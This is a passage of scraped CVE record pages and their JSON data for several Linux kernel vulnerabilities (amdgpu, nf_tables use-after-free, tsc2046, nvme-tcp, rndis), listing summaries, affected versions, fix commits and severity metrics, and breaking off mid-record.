2024-07-30 07:47
Modified
2025-09-16 08:02
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: Using uninitialized value *size when calling amdgpu_vce_cs_reloc
Initialize the size before calling amdgpu_vce_cs_reloc, such as case 0x03000001.
V2: To really improve the handling we would actually
need to have a separate value of 0xffffffff.(Christian)
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 Version: d38ceaf99ed015f2a0b9af3499791bd3a3daae21 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.577Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/855ae72c20310e5402b2317fc537d911e87537ef"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f8f120b3de48b8b6bdf8988a9b334c2d61c17440"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/88a9a467c548d0b3c7761b4fd54a68e70f9c0944"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42228",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:14:31.551012Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:33.081Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_vce.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d35cf41c8eb5d9fe95b21ae6ee2910f9ba4878e8",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "3b505759447637dcccb50cbd98ec6f8d2a04fc46",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "df02642c21c984303fe34c3f7d72965792fb1a15",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "da6a85d197888067e8d38b5d22c986b5b5cab712",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "9ee1534ecdd5b4c013064663502d7fde824d2144",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "855ae72c20310e5402b2317fc537d911e87537ef",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "f8f120b3de48b8b6bdf8988a9b334c2d61c17440",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
},
{
"lessThan": "88a9a467c548d0b3c7761b4fd54a68e70f9c0944",
"status": "affected",
"version": "d38ceaf99ed015f2a0b9af3499791bd3a3daae21",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/amdgpu/amdgpu_vce.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.2"
},
{
"lessThan": "4.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.321",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.283",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.225",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.166",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.108",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.39",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.321",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.283",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.225",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.166",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.108",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.39",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu: Using uninitialized value *size when calling amdgpu_vce_cs_reloc\n\nInitialize the size before calling amdgpu_vce_cs_reloc, such as case 0x03000001.\nV2: To really improve the handling we would actually\n need to have a separate value of 0xffffffff.(Christian)"
}
],
"providerMetadata": {
"dateUpdated": "2025-09-16T08:02:43.325Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d35cf41c8eb5d9fe95b21ae6ee2910f9ba4878e8"
},
{
"url": "https://git.kernel.org/stable/c/3b505759447637dcccb50cbd98ec6f8d2a04fc46"
},
{
"url": "https://git.kernel.org/stable/c/df02642c21c984303fe34c3f7d72965792fb1a15"
},
{
"url": "https://git.kernel.org/stable/c/da6a85d197888067e8d38b5d22c986b5b5cab712"
},
{
"url": "https://git.kernel.org/stable/c/9ee1534ecdd5b4c013064663502d7fde824d2144"
},
{
"url": "https://git.kernel.org/stable/c/855ae72c20310e5402b2317fc537d911e87537ef"
},
{
"url": "https://git.kernel.org/stable/c/f8f120b3de48b8b6bdf8988a9b334c2d61c17440"
},
{
"url": "https://git.kernel.org/stable/c/88a9a467c548d0b3c7761b4fd54a68e70f9c0944"
}
],
"title": "drm/amdgpu: Using uninitialized value *size when calling amdgpu_vce_cs_reloc",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42228",
"datePublished": "2024-07-30T07:47:08.955Z",
"dateReserved": "2024-07-30T07:40:12.250Z",
"dateUpdated": "2025-09-16T08:02:43.325Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-3610 (GCVE-0-2023-3610)
Vulnerability from cvelistv5
Published
2023-07-21 20:48
Modified
2025-02-13 16:56
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.
Flaw in the error handling of bound chains causes a use-after-free in the abort path of NFT_MSG_NEWRULE. The vulnerability requires CAP_NET_ADMIN to be triggered.
We recommend upgrading past commit 4bedf9eee016286c835e3d8fa981ddece5338795.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T07:01:56.594Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"patch",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=4bedf9eee016286c835e3d8fa981ddece5338795"
},
{
"tags": [
"x_transferred"
],
"url": "https://kernel.dance/4bedf9eee016286c835e3d8fa981ddece5338795"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5461"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00001.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230818-0005/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Kernel",
"repo": "https://git.kernel.org",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.4",
"status": "affected",
"version": "5.9",
"versionType": "custom"
}
]
}
],
"datePublic": "2023-06-20T20:41:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eA use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\u003c/p\u003e\u003cp\u003eFlaw in the error handling of bound chains causes a use-after-free in the abort path of NFT_MSG_NEWRULE. The vulnerability requires CAP_NET_ADMIN to be triggered.\u003c/p\u003e\u003cp\u003eWe recommend upgrading past commit 4bedf9eee016286c835e3d8fa981ddece5338795.\u003c/p\u003e"
}
],
"value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nFlaw in the error handling of bound chains causes a use-after-free in the abort path of NFT_MSG_NEWRULE. The vulnerability requires CAP_NET_ADMIN to be triggered.\n\nWe recommend upgrading past commit 4bedf9eee016286c835e3d8fa981ddece5338795."
}
],
"impacts": [
{
"capecId": "CAPEC-233",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-233 Privilege Escalation"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-08-18T13:06:25.093Z",
"orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"shortName": "Google"
},
"references": [
{
"tags": [
"patch"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=4bedf9eee016286c835e3d8fa981ddece5338795"
},
{
"url": "https://kernel.dance/4bedf9eee016286c835e3d8fa981ddece5338795"
},
{
"url": "https://www.debian.org/security/2023/dsa-5461"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00001.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230818-0005/"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
"assignerShortName": "Google",
"cveId": "CVE-2023-3610",
"datePublished": "2023-07-21T20:48:13.121Z",
"dateReserved": "2023-07-10T20:52:54.602Z",
"dateUpdated": "2025-02-13T16:56:15.002Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48927 (GCVE-0-2022-48927)
Vulnerability from cvelistv5
Published
2024-08-22 03:31
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
iio: adc: tsc2046: fix memory corruption by preventing array overflow
On one side we have indio_dev->num_channels includes all physical channels +
timestamp channel. On other side we have an array allocated only for
physical channels. So, fix memory corruption by ARRAY_SIZE() instead of
num_channels variable.
Note the first case is a cleanup rather than a fix as the software
timestamp channel bit in active_scanmask is never set by the IIO core.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48927",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:02.652045Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:00.502Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/iio/adc/ti-tsc2046.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0cb9b2f73c182d242a640e512f4785c7c504512f",
"status": "affected",
"version": "9374e8f5a38defe90bc65b2decf317c1c62d91dd",
"versionType": "git"
},
{
"lessThan": "082d2c047b0d305bb0b6e9f9d671a09470e2db2d",
"status": "affected",
"version": "9374e8f5a38defe90bc65b2decf317c1c62d91dd",
"versionType": "git"
},
{
"lessThan": "b7a78a8adaa8849c02f174d707aead0f85dca0da",
"status": "affected",
"version": "9374e8f5a38defe90bc65b2decf317c1c62d91dd",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/iio/adc/ti-tsc2046.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.14"
},
{
"lessThan": "5.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: adc: tsc2046: fix memory corruption by preventing array overflow\n\nOn one side we have indio_dev-\u003enum_channels includes all physical channels +\ntimestamp channel. On other side we have an array allocated only for\nphysical channels. So, fix memory corruption by ARRAY_SIZE() instead of\nnum_channels variable.\n\nNote the first case is a cleanup rather than a fix as the software\ntimestamp channel bit in active_scanmask is never set by the IIO core."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:15.611Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0cb9b2f73c182d242a640e512f4785c7c504512f"
},
{
"url": "https://git.kernel.org/stable/c/082d2c047b0d305bb0b6e9f9d671a09470e2db2d"
},
{
"url": "https://git.kernel.org/stable/c/b7a78a8adaa8849c02f174d707aead0f85dca0da"
}
],
"title": "iio: adc: tsc2046: fix memory corruption by preventing array overflow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48927",
"datePublished": "2024-08-22T03:31:19.861Z",
"dateReserved": "2024-08-21T06:06:23.298Z",
"dateUpdated": "2025-05-04T08:26:15.611Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48686 (GCVE-0-2022-48686)
Vulnerability from cvelistv5
Published
2024-05-03 14:59
Modified
2025-05-04 08:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nvme-tcp: fix UAF when detecting digest errors
We should also bail from the io_work loop when we set rd_enabled to true,
so we don't attempt to read data from the socket when the TCP stream is
already out-of-sync or corrupted.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-48686",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:39:58.605083Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-21T21:25:46.756Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-03T15:17:55.855Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/19816a0214684f70b49b25075ff8c402fdd611d3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5914fa32ef1b7766fea933f9eed94ac5c00aa7ff"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/13c80a6c112467bab5e44d090767930555fc17a5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c3eb461aa56e6fa94fb80442ba2586bd223a8886"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/160f3549a907a50e51a8518678ba2dcf2541abea"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/nvme/host/tcp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "19816a0214684f70b49b25075ff8c402fdd611d3",
"status": "affected",
"version": "3f2304f8c6d6ed97849057bd16fee99e434ca796",
"versionType": "git"
},
{
"lessThan": "5914fa32ef1b7766fea933f9eed94ac5c00aa7ff",
"status": "affected",
"version": "3f2304f8c6d6ed97849057bd16fee99e434ca796",
"versionType": "git"
},
{
"lessThan": "13c80a6c112467bab5e44d090767930555fc17a5",
"status": "affected",
"version": "3f2304f8c6d6ed97849057bd16fee99e434ca796",
"versionType": "git"
},
{
"lessThan": "c3eb461aa56e6fa94fb80442ba2586bd223a8886",
"status": "affected",
"version": "3f2304f8c6d6ed97849057bd16fee99e434ca796",
"versionType": "git"
},
{
"lessThan": "160f3549a907a50e51a8518678ba2dcf2541abea",
"status": "affected",
"version": "3f2304f8c6d6ed97849057bd16fee99e434ca796",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/nvme/host/tcp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.0"
},
{
"lessThan": "5.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.213",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.143",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.68",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.19.*",
"status": "unaffected",
"version": "5.19.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.0",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.213",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.143",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.68",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.19.9",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.0",
"versionStartIncluding": "5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-tcp: fix UAF when detecting digest errors\n\nWe should also bail from the io_work loop when we set rd_enabled to true,\nso we don\u0027t attempt to read data from the socket when the TCP stream is\nalready out-of-sync or corrupted."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:21:04.017Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/19816a0214684f70b49b25075ff8c402fdd611d3"
},
{
"url": "https://git.kernel.org/stable/c/5914fa32ef1b7766fea933f9eed94ac5c00aa7ff"
},
{
"url": "https://git.kernel.org/stable/c/13c80a6c112467bab5e44d090767930555fc17a5"
},
{
"url": "https://git.kernel.org/stable/c/c3eb461aa56e6fa94fb80442ba2586bd223a8886"
},
{
"url": "https://git.kernel.org/stable/c/160f3549a907a50e51a8518678ba2dcf2541abea"
}
],
"title": "nvme-tcp: fix UAF when detecting digest errors",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48686",
"datePublished": "2024-05-03T14:59:10.472Z",
"dateReserved": "2024-05-03T14:55:07.143Z",
"dateUpdated": "2025-05-04T08:21:04.017Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48926 (GCVE-0-2022-48926)
Vulnerability from cvelistv5
Published
2024-08-22 03:31
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: rndis: add spinlock for rndis response list
There's no lock for rndis response list. It could cause list corruption
if there're two different list_add at the same time like below.
It's better to add in rndis_add_response / rndis_free_response
/ rndis_get_next_response to prevent any race condition on response list.
[ 361.894299] [1: irq/191-dwc3:16979] list_add corruption.
next->prev should be prev (ffffff80651764d0),
but was ffffff883dc36f80. (next=ffffff80651764d0).
[ 361.904380] [1: irq/191-dwc3:16979] Call trace:
[ 361.904391] [1: irq/191-dwc3:16979] __list_add_valid+0x74/0x90
[ 361.904401] [1: irq/191-dwc3:16979] rndis_msg_parser+0x168/0x8c0
[ 361.904409] [1: irq/191-dwc3:16979] rndis_command_complete+0x24/0x84
[ 361.904417] [1: irq/191-dwc3:16979] usb_gadget_giveback_request+0x20/0xe4
[ 361.904426] [1: irq/191-dwc3:16979] dwc3_gadget_giveback+0x44/0x60
[ 361.904434] [1: irq/191-dwc3:16979] dwc3_ep0_complete_data+0x1e8/0x3a0
[ 361.904442] [1: irq/191-dwc3:16979] dwc3_ep0_interrupt+0x29c/0x3dc
[ 361.904450] [1: irq/191-dwc3:16979] dwc3_process_event_entry+0x78/0x6cc
[ 361.904457] [1: irq/191-dwc3:16979] dwc3_process_event_buf+0xa0/0x1ec
[ 361.904465] [1: irq/191-dwc3:16979] dwc3_thread_interrupt+0x34/0x5c
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f6281af9d62e128aa6efad29cf7265062af114f2 Version: f6281af9d62e128aa6efad29cf7265062af114f2 Version: f6281af9d62e128aa6efad29cf7265062af114f2 Version: f6281af9d62e128aa6efad29cf7265062af114f2 Version: f6281af9d62e128aa6efad29cf7265062af114f2 Version: f6281af9d62e128aa6efad29cf7265062af114f2 Version: f6281af9d62e128aa6efad29cf7265062af114f2 Version: f6281af9d62e128aa6efad29cf7265062af114f2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48926",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:05.816809Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:10.483Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/gadget/function/rndis.c",
"drivers/usb/gadget/function/rndis.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9f5d8ba538ef81cd86ea587ca3f8c77e26bea405",
"status": "affected",
"version": "f6281af9d62e128aa6efad29cf7265062af114f2",
"versionType": "git"
},
{
"lessThan": "669c2b178956718407af5631ccbc61c24413f038",
"status": "affected",
"version": "f6281af9d62e128aa6efad29cf7265062af114f2",
"versionType": "git"
},
{
"lessThan": "9f688aadede6b862a0a898792b1a35421c93636f",
"status": "affected",
"version": "f6281af9d62e128aa6efad29cf7265062af114f2",
"versionType": "git"
},
{
"lessThan": "9ab652d41deab49848673c3dadb57ad338485376",
"status": "affected",
"version": "f6281af9d62e128aa6efad29cf7265062af114f2",
"versionType": "git"
},
{
"lessThan": "4ce247af3f30078d5b97554f1ae6200a0222c15a",
"status": "affected",
"version": "f6281af9d62e128aa6efad29cf7265062af114f2",
"versionType": "git"
},
{
"lessThan": "da514063440b53a27309a4528b726f92c3cfe56f",
"status": "affected",
"version": "f6281af9d62e128aa6efad29cf7265062af114f2",
"versionType": "git"
},
{
"lessThan": "33222d1571d7ce8c1c75f6b488f38968fa93d2d9",
"status": "affected",
"version": "f6281af9d62e128aa6efad29cf7265062af114f2",
"versionType": "git"
},
{
"lessThan": "aaaba1c86d04dac8e49bf508b492f81506257da3",
"status": "affected",
"version": "f6281af9d62e128aa6efad29cf7265062af114f2",
